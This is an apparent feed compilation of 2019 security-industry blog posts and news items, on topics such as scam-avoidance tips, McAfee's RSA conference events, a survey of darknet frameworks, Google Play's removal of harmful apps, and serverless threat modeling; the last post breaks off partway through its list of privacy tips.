As the economy continues to improve, CIOs are less hampered in 2019 by tightening budgets. And worries about moving to the cloud are less of an issue, since many companies have already made the jump. Executives put more emphasis now on securing their cloud-based assets across multiple cloud environments.  

To read this article in full, please click here

PACE – People, Alignment, Culture, and Execution

McAfee was founded in 1987, and at 32 years old, we’re moving faster than ever before with more precision, agility, and innovation. With McAfee’s expected growth in 2019 as the device-to-cloud cybersecurity company, we recognize the need to ensure that the Americas Channel Team is sharply focused. As I’ve met with members of my team, both individually and in planning sessions, we are already hitting the ground running. This year, the stage is set for our PACE—our pace within the company, and our People, Alignment, Culture, and Execution.

The first focus area, Our People, not only encompasses our team, but also our partners and customers. I truly believe if you take care of the people, the people will take care of you. As a Channel Organization, we ensure that both our partners’ and customers’ needs are met. Through tightly aligned cross-functional organizations internally, we are creating powerful unity as we serve customers together.

Our Alignment concentrates on making sure we’re moving in the same direction at the same time.

Within Our Culture, we have a primary and secondary culture. Our primary culture is centered around our pledge that each McAfee employee signs, declaring dedication to keeping the world safe from cyberthreats. However, the Channel Organization has also cultivated a secondary culture, which is supported by our corporate value surrounding candor and transparency. We aim for both cultures to be evident in everything we do.

With Our Execution, we believe that if we commit to something, we must execute it. Accountability is a priority for our team. Our Execution is currently centered around our MVISION portfolio family, which includes MVISION Endpoint, ePO, Cloud, Mobile, and EDR (coming soon). Designed to encompass our overall brand through a simple approach, MVISION is an integrated, open system from device to cloud that offers consolidated visibility, comprehension, and control across a digital landscape. If you’re not up to speed on MVISION, please take some time to research and get familiar. Our mutual customers are going to love it.

This year, we are excited to be working on our PACE. We are committed to maintaining a healthy PACE for the betterment of our customers, partners, and team. We hope the PACE we set this year will serve all who interact with McAfee.

The post PACE – People, Alignment, Culture, and Execution appeared first on McAfee Blogs.

Optus privacy breach: names, addresses and details revealed in sim card glitch

Some mobile users were able to see records of others when logging on to the phone service

Optus has scrambled to contact customers whose personal details were revealed in a system glitch, affecting pre-paid mobile sim card activation and the company’s account website.

Some customers have reported being able to see what looked like other customers’ personal details, including names, addresses and phone numbers while trying to activate a mobile phone sim card.

Related: My Health Record 'minor glitch' still generating thousands of pages of internal files

Related: 'The goal is to automate us': welcome to the age of surveillance capitalism

Hey @Optus I just got an email saying my latest bill is ready. Its $300. It should be less than $100 as my usual plan. I logged into my account and it said "Hi Vladamir". I have a screenshot. What's the go??!

Continue reading...

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Get More Bang for your Buck: Hire an MSSP vs. an In-House Expert

Many leaders in security feel some degree of uncertainty when they see the price tag that accompanies Managed Security Service Providers (MSSPs). While the hesitation is understandable, it’s not necessarily logical.

When the options are narrowed down to hiring an MSSP or hiring a single employee, the costs end up being roughly the same.  The difference, though, lies in what you are getting for your money. For instance, when you hire a single employee, you are limited in ways that an MSSP is not.

Consider, what will you do when your employee wants to take time off, or gets sick? How many different areas of expertise can this employee cover? Will they work around the clock? If not, how will you stay secure outside of business hours?

Keep these questions in mind as we take a look at what exactly you are paying for when you hire an MSSP:

At any one time, most MSSPs are staffed with at least four analysts.  And I mean any time.  Don’t forget that a key component of MSSPs is that they are operating around the clock- 24/7/365.  This doesn’t include the threat hunting experts or incident response specialists that many MSSPs have on staff in case of an incident.  To achieve protection similar to what an MSSP provides, you would need a dedicated staff of at least 4-6 employees.

Now take into consideration that your employees will be expecting benefits and paid time off.    You must also account for the unexpected circumstances- family emergencies, illness- that will undoubtedly arise as they do in any staff.  An MSSP, however, already has these factors accounted for and will be appropriately staffed to ensure around-the-clock security coverage.

And, because of the significant amount of employees you have access to, you will naturally have access to a wide variety of skills- a much larger range of expertise than a single employee, or even two or three employees for that matter- could cover.  Not to mention, you will have a hard time finding employees that are willing to work swing shifts.  With a cybersecurity skills shortage of 2.9 million employees, you may have a hard time finding employees at all.  And, if you do find a talented employee, you can bet it’ll be a constant struggle keeping them around with the sheer amount of recruiters knocking at their doors.

But it’s not only the talent and expertise you are paying for when you hire an MSSP.  With an MSSP you are also getting access to the best-in-class technology as well, including SIEM, endpoint monitoring, and reporting tools.

So, yes, hiring an MSSP is comparable in cost to hiring one security professional. But, if you’re paying the same amount, why not get the most out of your money?  The benefits that an MSSP provides you with that a single employee cannot are immense:

  • 24/7 coverage without the worry of finding and retaining talent during the cybersecurity skills shortage
  • Relief from the burden of staffing and accounting for PTO, sick time, or overnight staff
  • Security protection from diverse areas of expertise
  • Access to the best-in-class technology

Keep in mind that in order to reap the many benefits of an MSSP, you must be deliberate when choosing your security partner.

Find the right MSSP for your needs with our Comprehensive Guide.

 

The post Get More Bang for your Buck: Hire an MSSP vs. an In-House Expert appeared first on GRA Quantum.

The Best Ways to Catch McAfee at RSA Conference 2019

In just a few weeks, San Francisco will be taken over by cybersecurity professionals and vendors at Moscone Center for the 2019 RSA Conference. There’s a lot packed into the conference—that’s why we’re breaking down the best ways to see McAfee in action. So take out your calendars and make note of the events below.

McAfee Leadership Takes the Stage

CSA Summit Keynote: Case Study: Behind the Scenes of MGM Resorts’ Digital Transformation
Monday, March 4 | 11:35 am – 11:55 am | Moscone Center

Rajiv Gupta, Senior Vice President, Cloud Security Business Unit, McAfee

Scott Howitt, Senior Vice President & Chief Information Security Officer, MGM Resorts International

As a leader in their industry, MGM is transforming into a digital business by aggressively adopting the cloud to make their employees more engaged and productive and to deliver modern experiences to their customers. Join Rajiv Gupta, SVP of McAfee’s Cloud Business, and Scott Howitt, SVP and CISO for MGM Resorts International, to hear how MGM is protecting their enterprise data across the whole spectrum of their evolving infrastructure, from on-prem, to the device, to their SaaS, IaaS and PaaS cloud instances. More, here.

 

Session: #Ransomware – The Rise, Death and Resurrection of Digital Extortion
Monday, March 4 | 4:45 pm – 5:15 pm | Session Code: SEM-M03

John Fokker

Head of Cyber Investigations

Raj Samani

Chief Scientist, McAfee Fellow

 

Hear from cybercrime experts on the successes and lessons learned from the No More Ransom initiative, an online portal that has prevented millions of dollars in ransom payments to cybercriminals. Recent statistics point to a decrease in the number of ransomware variants. So, is ransomware dead? Not so fast. Get up to speed on what’s new in the ongoing effort to combat the threat of ransomware. More, here.

Keynote: Lightning in a Bottle, or Burning Down the House?
Tuesday, March 5 | 8:35 am – 8:55 am | RSA, West Stage

Dr. Celeste Fralick 

Chief Data Scientist 

Steve Grobman

Senior Vice President and Chief Technology Officer

 

Fire. In the wild, it’s a force for destruction. Controlled, it powers civilization’s forward evolution. But containing phenomena—natural or manmade—is a devilish challenge. Today’s regulatory hotspots include AI and quantum computing, because innovations that strengthen defenses can also fuel targeted threats. The weaponization of AI to amplify cyberattack impacts is enough to give anyone pause, so discussion of export controls on these and other technologies is a worthy conversation. What is the path forward to advance and protect human progress? How do we nurture sparks of innovation without burning bridges to the future? More, here.

Session: Using Machine Learning to Improve Security Predictions
Tuesday, March 5 | 11:00 am – 11:50 am | Session Code: SPO2-T06

Grant Bourzikas

Chief Information Security Officer (CISO) & Vice President of McAfee Labs Operations

 

 

 

Organizations are overwhelmed by data and dependent on outdated (nonpredictive) tools and methods. Security companies can’t keep up with the frequency of attacks, 50% of which are missed by traditional antivirus programs. In this session, McAfee’s CISO will share his experiences, providing valuable information for security organizations to predict attacks by relying on data science and machine learning. More, here.

Session: Mulitparty Vulnerability Disclosure: From Here to Where?
Wednesday, March 6 | 9:20 am – 10:10 am | Session Code: PDAC-W03

As the world grows ever more dependent on complex technological systems, the risk of broadly impactful vulnerabilities in software and hardware is driving the need for improvements in how the global ecosystem addresses identification and disclosure of those vulnerabilities. This panel will discuss what works, what doesn’t, and suggest a path forward that can benefit everyone globally. More, here.

Moderator: John Banghart, Senior Director, Venable

Panelists: Kent Landfield, Chief Standards and Technology Policy Strategist, McAfee LLC

Art Manion, Vulnerability Analysis Technical Manager, CERT Coordination Center

Audrey Plonk, Director, Global Security Policy, Intel Corporation

Session: Law Enforcement: The Secret Weapon in the CISO’s Toolkit
Friday, March 8 | 11:10 am – 12:00 pm | Session Code: AIR-F03

John Fokker

Head of Cyber Investigations

 

 

 

This session will show you how to get the most out of working with law enforcement agencies (LEA) before, during or after a security breach. Learn why partnering with law enforcement can be a valuable strategic asset in the CISO’s ever-expanding toolbox of security measures. More, here.

Hack Your Way Through the Crowds at the McAfee Booth

We’re hosting a fun and interactive Capture the Flag challenge at our RSA booth to test the investigative and analytical skills of RSA attendees. Contestants will be given various challenges and will receive “flag” details on how to complete each challenge as quickly and accurately as possible. Want to know who is in the lead? Don’t worry, we’ll have a live scoreboard. The winner of the RSA Capture the Flag contest will get bragging rights and a cool prize to take home. Visit us at booth #N5745 in the North Hall.

Cloud Security BarCade Challenge

Tuesday, March 5 | 6:00 pm – Midnight | Coin-Op Game Room, San Francisco | 508 4th Street

We’re hosting an epic cloud security networking event at Coin-Op Game Room in San Francisco! What’s the challenge? Come out to see us and find out. There will be prizes, games, food, networking, and more. Register here.

RSA After-Hours Social & Cloud Security Panels

Wednesday, March 6 | 6:30 pm – 11:00 pm | Mourad, San Francisco | 140 New Montgomery Street

We’re bringing the cloud community together for a night of networking at Mourad, so grab your peers and head over to the after-hours social. We will have a DJ, awesome food, creative libations, and a VIP area upstairs for a private whiskey tasting. Throughout the night, we’ll be hosting cloud security panels, where you’ll hear perspectives from industry experts on the current security landscape, best practices, and how to elevate your cloud security posture. Register here and join us as we close out RSA at the after-hours social of the year.

There’s a lot to look forward to at RSA 2019, so be sure to stop by booth #N5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XSU9MCAFEE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

The post The Best Ways to Catch McAfee at RSA Conference 2019 appeared first on McAfee Blogs.

Beyond Tor: Examining the Uncharted Corners of the Dark Web

More Than Tor: Deep Dive Into the Dark Web with Ben Brown Veracode

Discussions about the darknet or dark web are typically centered around the Tor network, and the data from breaches, password dumps, and hacked emails that can be found there. There is little focus or discussion about the other extant darknet frameworks, and the fact that the dark web is actually comprised of multiple networks designed for specific underground activity. While Europol reports and high-profile takedowns of Tor services en masse has indicated the activity is, indeed, dark, this is not always the case when you look at the dark web in its totality.

The dark web is a complex, layered environment that raises equally complex interplay involving free speech, capitalism, and potential illicit or criminal activity. It is also home to what could be considered hobbyist uses: anonymous chess over I2P, puzzle and art installments, underground market offerings for bags of beach sand or pet bricks, and John Wayne fan sites. The dark web’s networks are made up of active users from around the world, and in addition to finding hackers for hire, you can also find legitimate advanced courses from technologists who help to dissect cyberthreats.

Each darknet was created with different intentions and ideas in mind, with developers who possess different goals for the network’s use. While one is popular with hacktivists, another is preferred by cybercriminals looking for profit, and another for fringe groups and crypto enthusiasts. New darknet frameworks are emerging and will continue to emerge into the distant future.

Here we examine some of the frameworks that exist, and what the activity in each framework reveals about the varying motivations of its users, offering a more complete and realistic understanding of the dark web’s ecology.

A Closer Look at Dark Web Frameworks

Tor’s stated goals are to protect your privacy and defend yourself against network surveillance and traffic analysis. Another major, and more recent, goal is to bring wider access to anonymous web browsing through increasing user-friendliness. This is not something you see as a major goal for the darknets other than Tor and OpenBazaar. Tor gets lots of media attention for terrorism, but this is not necessarily a valid perception. I didn’t observe much in the way of terrorist activity, and this darknet is driven by what’s for sale, which includes hacking for hire, tools for sale, and activity related to money-laundering services. The audience here is primarily made up of English speakers.

Freenet is a peer-to-peer platform for censorship-resistant communication and publishing, and focuses heavily on the promotion of freedom of speech over censorship, copyright, and takedown. It is here I uncovered documents like handbooks and information from terrorist organizations, and even an assassination plan and other extreme activity. Freenet is driven by ideology rather than financial motives, and it has a number of social platforms and chat systems. Its users tend to lean toward a small or non-intrusive government, and it is popular with crypto activists. On this darknet, we have not found anything for sale in our research, likely because its users give away useful information. It is home to hacked documents, including leaked, confidential TTIP negotiation documents; internal Diebold emails about how their voting machines are flawed; pre-written Spectre exploit code and guide; and data or document dumps that are public. To date, it has resisted any external takedown attempts.

I2P project is a popular darknet for multiple self-proclaimed factions of Anonymous, and other self-described hacktivists. In fact, its stated mission is that it is intended to “protect communication from dragnet surveillance and monitoring by third parties such as ISPs” and is “used by many people who care about their privacy: activists, oppressed people, journalists and whistleblowers, as well as the average person.” The content is primarily in Russian, Chinese, and English, and includes an archive of past classes for hactivists that cover hacking and different techniques. Some of the talks still have the names of the presenters on them, including on a course on advanced web application hacking given by a researcher from a top technology firm. This darknet also includes a chat portal, access to a DDoS tool, and a web application vulnerability scanner.

As I researched I2P, I also found a cryptocurrency that I had not previously run into called GOSTcoin, which is a branch of anoncoin and has a small clearnet footprint. It was developed specifically for I2P use and is allegedly based on Russian Government cryptography, though I haven’t yet audited the code to verify this claim. It has a very light presence on Facebook, Twitter, LinkedIn, and in some cryptocurrency forums.

OpenBazaar is one of the newest dark web frameworks, and its purpose is to offer a feeless, peer-to-peer marketplace that leverages cryptocurrencies for transactions. There are some illicit offerings, including drugs, hacking tools, books and services, stolen media streaming accounts, and bulk social media accounts. However, the majority is the more mundane, like original artwork, jewelry, clothing, books, and health supplements. There is a wealth of interesting information based on geographies and language use can help us contextualize these frameworks and their underpinnings and offerings.

Is the Dark Web the Future of the Internet?

We are still a long way from the Dark Web taking a place as a mainstream means of accessing the worldwide web. These technologies are overlay networks, and they require the regular, clearnet internet to operate. Some meshnet projects have shown progress and are able to operate separately; however, they are still in their infancy and have relatively few users. When the dark web is discussed by the media or public sector, they often invoke an image of some hidden and shielded den of crime populated by anonymous ne'er-do-wells engaged in illicit affairs.

While this narrative is useful for getting views and justifying budgets, it can also lend itself to skewed threat modeling and unfocused alarm. The majority of the content I found in my research was, in most cases, rather benign. The criminals offering or seeking illicit goods or services were present on each of the darknets, but made up a small minority of the network activity and content. Much more of this type of commerce is found on the clearnet (typically in forums, many with vetting systems).

The dark web should have a place in many entities’ risk analysis and threat modeling, but it is important to understand both the sort of content that is contained or trafficked there, and the scale of this activity when compared to other theaters such as meatspace, telecom systems, or the clearnet. With that, remember that buying weapons is much easier and less expensive through legitimate venues or off the street, human trafficking is by and large the domain of word of mouth and Craigslist-like clearnet sites, and there are no legitimate hitmen for hire on the dark web, no matter what the media may say.

To learn more about each of the dark web frameworks and my analysis, download my research paper, “More Than Tor: A Deep Dive.”

What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day?

I was listening to the Valentine’s Day playlist of my friend when suddenly espied one of my favorites- Ain’t No Mountain High Enough and started humming the song. Remember it?

If you need me call me

No matter where you are

No matter how far;

Just call my name

I’ll be there in a hurry

You don’t have to worry coz

Baby there ain’t any mountain high enough…

To keep me from getting to you.

Post becoming a mom, it resonated more with me and I would often find myself singing the song whilst doing my daily chores. (Hope the kids heard me and remember the words!).

In the digital age, when kids are maturing faster and social media reflects the rapid rate at which hearts are getting connected and then disconnected, it’s important that we talk about online romances, dating sites and privacy with our teens.

Is your teen sporting a moony look and walking around as if on cloud 9? Then it’s time to sit them down and have ‘the talk’- the one about crushes, love and the need for separating digital life from their romantic life.

So how do you go about it? You can start on a light note, discussing Valentine’s Day and the number of roses they may have received or gifted. Talk about their friends and the various plans they are making for this special day. You may then gently lead the conversation to online romances and the rising interest in dating websites among adolescents. Finally, it’s time to discuss account security and privacy.

Here are some tips you can share with your kids during your heart-to-heart talk on digital age romance:

  • Whisper sweet nothings in each other’s ears but not your account passwords
  • Share your hobbies and dreams, but keep your sensitive information private
  • Make new friends online but only as long as the conversation stays decent and non-intrusive
  • Use PIN or biometrics to lock your devices. Set autolock to 10 sec
  • Money attracts the attention of cyber criminals like nothing else. Avoid making online payments to help out a friend seemingly in distress, without consulting someone senior and trusted. Be judicious – do not share ATM PIN or credit card CVV number
  • Take time to decide whether or not you want to create a common social media account and avoid if possible. You wouldn’t have the control over posting
  • If your social media account is compromised, write a general post informing all about it, take screenshots of offending content and delete account
  • Use only secured devices with authentic software -This is to be implemented without fail by all family members

Isn’t it also a good time to talk to kids about real love – The love that isn’t limited to romance? Love is also when Mom gets up at midnight to make a studious child a cup of hot chocolate; when Dad forgoes his annual vacation plans to buy a collegian a dream laptop; when friends make plans to spend maximum time possible with a depressed friend; when a teacher spends extra time helping a child improve grades; when a 4-year old makes and proudly serves her Mom a cup of tea. Love is all that and more.

Recently Safer Internet Day was celebrated worldwide and I am really happy to note that not only security firms, government agencies and experts, but even schools, media and various NGOs showed support through activities, slogans, posts and discussions. Though the number is still insignificant, if you consider that we are a billion plus nation, it’s a start. Awareness of the issue and commitment to be a changemaker are the first two steps towards a positive digital life.

Here are some DIY ideas for your child for Valentine’s Day:

  1. Make cards for near and dear ones, showing appreciation and love
  2. Make and hang heart chains to decorate their rooms/the house
  3. Get flowers and chocolates for grandparents, domestic help, school bus drivers, canteen staff etc. to thank them for their support
  4. Compose poems and songs mentioning each loved one and sing it at the next social meet
  5. Visit a children’s hospital with parents and share cards and small gifts

These activities will not only boost their creativity and realization of real relationsships, but will also help them lead a balanced digital life.

Happy Valentine’s Day to you all!

The post What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day? appeared first on McAfee Blogs.

How we fought bad apps and malicious developers in 2018


Posted by Andrew Ahn, Product Manager, Google Play
[Cross-posted from the Android Developers Blog]

Google Play is committed to providing a secure and safe platform for billions of Android users on their journey discovering and experiencing the apps they love and enjoy. To deliver against this commitment, we worked last year to improve our abuse detection technologies and systems, and significantly increased our team of product managers, engineers, policy experts, and operations leaders to fight against bad actors.
In 2018, we introduced a series of new policies to protect users from new abuse trends, detected and removed malicious developers faster, and stopped more malicious apps from entering the Google Play Store than ever before. The number of rejected app submissions increased by more than 55 percent, and we increased app suspensions by more than 66 percent. These increases can be attributed to our continued efforts to tighten policies to reduce the number of harmful apps on the Play Store, as well as our investments in automated protections and human review processes that play critical roles in identifying and enforcing on bad apps.
In addition to identifying and stopping bad apps from entering the Play Store, our Google Play Protect system now scans over 50 billion apps on users' devices each day to make sure apps installed on the device aren't behaving in harmful ways. With such protection, apps from Google Play are eight times less likely to harm a user's device than Android apps from other sources.
Here are some areas we've been focusing on in the last year and that will continue to be a priority for us in 2019:

Protecting User Privacy

Protecting users' data and privacy is a critical factor in building user trust. We've long required developers to limit their device permission requests to what's necessary to provide the features of an app. Also, to help users understand how their data is being used, we've required developers to provide prominent disclosures about the collection and use of sensitive user data. Last year, we rejected or removed tens of thousands of apps that weren't in compliance with Play's policies related to user data and privacy.
In October 2018, we announced a new policy restricting the use of the SMS and Call Log permissions to a limited number of cases, such as where an app has been selected as the user's default app for making calls or sending text messages. We've recently started to remove apps from Google Play that violate this policy. We plan to introduce additional policies for device permissions and user data throughout 2019.

Developer integrity

We find that over 80% of severe policy violations are conducted by repeat offenders and abusive developer networks. When malicious developers are banned, they often create new accounts or buy developer accounts on the black market in order to come back to Google Play. We've further enhanced our clustering and account matching technologies, and by combining these technologies with the expertise of our human reviewers, we've made it more difficult for spammy developer networks to gain installs by blocking their apps from being published in the first place.

Harmful app contents and behaviors

As mentioned in last year's blog post, we fought against hundreds of thousands of impersonators, apps with inappropriate content, and Potentially Harmful Applications (PHAs). In a continued fight against these types of apps, not only do we apply advanced machine learning models to spot suspicious apps, we also conduct static and dynamic analyses, intelligently use user engagement and feedback data, and leverage skilled human reviews, which have helped in finding more bad apps with higher accuracy and efficiency.
Despite our enhanced and added layers of defense against bad apps, we know bad actors will continue to try to evade our systems by changing their tactics and cloaking bad behaviors. We will continue to enhance our capabilities to counter such adversarial behavior, and work relentlessly to provide our users with a secure and safe app store.
How useful did you find this blog post?


Kicking off 2019 with Recognition Across the McAfee Portfolio

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude of technologies. Excellence that we believe is validated by our larger peer and analyst community.

We’ve just announced that McAfee was named a Gartner Peer Insights Customers’ Choice for another two technologies. Our customers have recognized us as a January 2019 Gartner Peer Insights Customers’ Choice for Secure Web Gateway for McAfee Web Protection, McAfee Web Gateway, and McAfee WebGateway Cloud Service. In addition, for the second year in a row McAfee’s MVISION Cloud (formerly McAfee Skyhigh Security Cloud) was named a January 2019 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In 2018, McAfee was the only vendor named a Customers’ Choice in the Cloud Access Security Brokers market.

Our team at McAfee takes great pride in these distinctions, as customer feedback is essential in shaping our products and services. We put our customers at the core of everything we do and this shows pervasively across our portfolio. We believe our position as a Gartner Peer Insights Customers’ Choice for Secure Web Gateway, Data Loss Prevention, SIEM, Endpoint Protection and Cloud Access Security Broker (CASB) is a testament to the strength of our device-to-cloud strategy. This adds up to recognition’s in the last year in five different markets.

We also think it’s a signal of the way enterprises are approaching security – with the innovative technology solutions and integrated strategies that must evolve to fight a threat that is constantly evolving, too.

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN

Leslie Bois, Vice President of Global Channel and Alliances

Leslie Bois, Veracode’s Vice President of Global Channel and Alliances, has been selected to the prestigious CRN 2019 Channel Chiefs list. Bois earned the industry recognition for the second consecutive year, a reflection of the growth and influence she has introduced since joining Veracode in 2017.

Bois is responsible for developing and executing Veracode’s global strategy to build a strong partner network that plays a significant role in the company’s go-to-market efforts. She works cross functionally to align all aspects of the business to support channel partners to grow their businesses with Veracode’s platform of leading application security solutions.

Under her leadership, Veracode’s channel pipeline has grown by three times over the past 12 months, and the company’s international business is growing rapidly in partnership with managed security service providers around the world. Veracode has added partners in emerging markets in Asia, Latin America, Europe and the Middle East, and has enabled channel partner success by realigning channel support and resources.

“It’s an honor to earn this recognition from CRN, and reflects the hard work Veracode is doing on behalf of customers to maintain security at the speed of development,” said Bois. “The application security market is poised to take off, and our focus in 2019 will be ensuring our partners are equipped to provide the solutions and training businesses need to secure their software. It's imperative that good software is synonymous with secure software. Solution providers are going to be critical in helping meet the demands of enterprise and SMB application security programs.”

Each of the 2019 Channel Chiefs has demonstrated exceptional leadership, vision, and commitment to their channel partner programs. Channel Chief honorees are selected by CRN’s editorial staff as a result of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.

“The individuals on CRN’s 2019 Channel Chiefs list deserve special recognition for their contribution and support in the development of robust partner programs, innovative business strategies, and significant influence to the overall health of the IT channel,” said Bob Skelley, CEO of The Channel Company. “We applaud each Channel Chief’s remarkable record of accomplishments and look forward to following their continued success.”

Read the press release here, and find out more about partnering with Veracode by visiting here.

The Exploit Model of Serverless Cloud Applications

Serverless platform-as-a-service (PaaS) offerings are being deployed at an increasing rate for many reasons. They relate to information in a myriad of ways, unlocking new opportunities to collect data, identify data, and ultimately find ways to transform data to value.

Figure 1. Serverless application models.

Serverless applications can cost-effectively reply and process information at scale, returning critical data models and transformations synchronously to browsers or mobile devices. Synchronous serverless applications unlock mobile device interactions and near-real-time processing for on-the-go insights.

Asynchronous serverless applications can create data sets and views on large batches of data over time. We previously needed to have every piece of data and run batch reports, but we now have the ability to stagger events, or even make requests, wait some time to check in on them, and get results that bring value to the organization a few minutes or an hour later.

Areas as diverse as tractors, manufacturing, and navigation are benefiting from the ability to stream individual data points and look for larger relationships. These streams build value out of small bits of data. Individually they’re innocuous and of minimal value, but together they provide new intelligence we struggled to capture before.

The key theme throughout these models is the value of the underlying data. Protecting this data, while still using it to create value becomes a critical objective for the cloud-transforming enterprise. We can start by looking at the model for how data moves into and out of the application. A basic access and data model illustrates the way the application, access medium, CSP provider security, and serverless PaaS application have to work together to balance protection and capability.

Figure 2. Basic access and data model for serverless applications.

A deeper exploration of the security environment—and the shared responsibility in cloud security—forces us to look more carefully at who is involved, and how each party in the cloud ecosystem is empowered to see potential threats to the environment, and to the transaction specifically. When we expand the access and data model to look at the activities in a modern synchronous serverless application, we can see how the potential threats expand rapidly.

Figure 3. Expanded access and data model for a synchronous serverless application.

Organizations using this common model for an integrated serverless PaaS application are also gaining information from infrastructure-as-a-service (IaaS) elements in the environment. This leads to a more specific view of the threats that exist:

Figure 4. Sample threats in a serverless application.

 

By pushing the information security team to more carefully and specifically consider the ways the application can be exploited, they can then take simple actions to ensure that both development activities and the architecture for the application itself offer protection. A few examples:

  • Threat: Network sniffing/MITM
  • Protection: High integrity TLS, with signed API requests and responses

 

  • Threat: Code exploit
  • Protection: Code review, and SAST/pen testing on regular schedule

 

  • Threat: Data structure exploit
  • Protection: API forced data segmentation and request limiting, managed data model

The organization first must recognize the potential risk, make it part of the culture to ask the question, “What threats to my data does my change or new widget introduce?” and make it an expectation of deployment that privacy and security demand a response.

Otherwise, your intellectual property may just become the foundation of someone else’s profit.

The post The Exploit Model of Serverless Cloud Applications appeared first on McAfee Blogs.

Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You?

A classic meet-cute – the moment where two people, destined to be together, meet for the first time. This rom-com cornerstone is turned on its head by Netflix’s latest bingeable series “You.” For those who have watched, we have learned two things. One, never trust someone who is overly protective of their basement. And two, in the era of social media and dating apps, it’s incredibly easy to take advantage of the amount of personal data consumers readily, and somewhat naively, share online and with the cloud every day.

We first meet Joe Goldberg and Guinevere Beck – the show’s lead characters – in a bookstore, she’s looking for a book, he’s a book clerk. They flirt, she buys a book, he learns her name. For all intents and purposes, this is where their story should end – but it doesn’t. With a simple search of her name, Joe discovers the world of Guinevere Beck’s social media channels, all conveniently set to public. And before we know it, Joe has made himself a figurative rear-window into Beck’s life, which brings to light the dangers of social media and highlights how a lack of digital privacy could put users in situations of unnecessary risk. With this information on Beck, Joe soon becomes both a physical and digital stalker, even managing to steal her phone while trailing her one day, which as luck would have it, is not password protected. From there, Joe follows her every text, plan and move thanks to the cloud.

Now, while Joe and Beck’s situation is unique (and a tad dramatized), the amount of data exposed via their interactions could potentially occur through another romantic avenue – online dating. Many millennial couples meet on dating sites where users are invited to share personal anecdotes, answer questions, and post photos of themselves. The nature of these apps is to get to know a stranger better, but the amount of personal information we choose to share can create security risks. We have to be careful as the line between creepy and cute quickly blurs when users can access someone’s every status update, tweet, and geotagged photo.

While “You” is an extreme case of social media gone wrong, dating app, social media, and cloud usage are all very predominant in 2019. Therefore, if you’re a digital user, be sure to consider these precautions:

  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public, so turn your profiles to private in order to have control over who can follow you. Take it a step further and go into your app settings to control which apps you want to share your location with and which ones you don’t.
